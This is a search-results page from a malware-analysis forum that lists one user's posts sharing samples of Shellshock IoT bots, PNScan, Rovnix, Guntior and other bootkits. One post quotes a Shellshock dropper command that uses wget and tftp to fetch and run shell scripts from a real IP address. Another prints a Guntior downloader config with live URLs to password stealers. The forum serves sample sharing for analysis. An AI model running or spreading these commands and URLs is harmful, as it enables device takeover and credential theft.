A forum for reverse engineering, OS internals and malware analysis 

Search found 10 matches


Re: Linux/Bash0day alias Shellshock alias Bashdoor

 by jioushizhu ¦  Tue Oct 11, 2016 4:42 am ¦  Forum: Malware ¦  Topic: Linux/Bash0day alias Shellshock alias Bashdoor ¦  Replies: 42 ¦  Views: 128034

https://github.com/gh0std4ncer/lizkebab 46.165.253.13:4574 ok cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; busybox wget http://46.165.253.13/IoT.sh; chmod 777 IoT.sh; sh IoT.sh; tftp 46.165.253.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.165.253.13; chmod...

Re: Linux/PNScan

 by jioushizhu ¦  Fri Aug 26, 2016 5:25 am ¦  Forum: Malware ¦  Topic: Linux/PNScan ¦  Replies: 27 ¦  Views: 36005

Found in China Telecom equipment

arm.rar

Re: Linux/PNScan

 by jioushizhu ¦  Thu Aug 25, 2016 10:26 am ¦  Forum: Malware ¦  Topic: Linux/PNScan ¦  Replies: 27 ¦  Views: 36005

Found in a Lenovo newifi router in China
I did not upload two of the files, recheck and good2, which are the IP and password files

muma.rar

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Wed Feb 05, 2014 1:01 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

rovnix_j.7z

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Tue Feb 04, 2014 12:45 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

VMware Windows XP SP2 boot BSOD

Re: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader)

 by jioushizhu ¦  Mon Feb 03, 2014 10:57 am ¦  Forum: Malware ¦  Topic: WinNT/Rovnix (alias Mayachok, Cidox, BkLoader) ¦  Replies: 83 ¦  Views: 118242

VBR Infectors - TrojanDropper:Win32/Rovnix.J (Microsoft) Droppers: https://www.virustotal.com/ru/file/3112e4e96d9a1308c93061e070172f81b92c03231b71b6ca02de06fae163fa72/analysis/ https://www.virustotal.com/ru/file/49014d90f42881140256dc8d8a629d2a110656c0931f98e032b1b313da70a7e1/analysis/ https://www....

Re: Guntior bootkit (Chinese combine)

 by jioushizhu ¦  Sat Jul 06, 2013 12:14 pm ¦  Forum: Malware ¦  Topic: Guntior bootkit (Chinese combine) ¦  Replies: 35 ¦  Views: 38302

Guntior dropper+dll+driver in the attachment
Downloads a lot of online game password stealers.
[info]
isdown=1
huifang=60
jiange=5 /* interval=5 --hx1997 */
url1=http://122.224.8.92:904/a09.exe
pid1=Lobby.exe /* 456 Game Lobby */
biaoshi1=ga5nm4 /* identifier=ga5nm4 */
url2=http://122.224.8.92:903/a11.exe
pid2=QQ...

Re: Cidox bootkit downloader +

 by jioushizhu ¦  Mon Jan 21, 2013 5:12 am ¦  Forum: Malware ¦  Topic: Cidox bootkit downloader + ¦  Replies: 3 ¦  Views: 3336

Driver file time : 2012-5-3
Old version Cidox.b

Re: Cidox bootkit downloader +

 by jioushizhu ¦  Sun Jan 20, 2013 12:03 pm ¦  Forum: Malware ¦  Topic: Cidox bootkit downloader + ¦  Replies: 3 ¦  Views: 3336

Re: Rootkit MaxSS (alias TDSS, SST, Alureon.FE, Olmasco)

 by jioushizhu ¦  Sat Jan 05, 2013 10:44 am ¦  Forum: Malware ¦  Topic: Rootkit MaxSS (alias TDSS, SST, Alureon.FE, Olmasco) ¦  Replies: 149 ¦  Views: 164189

MaxSS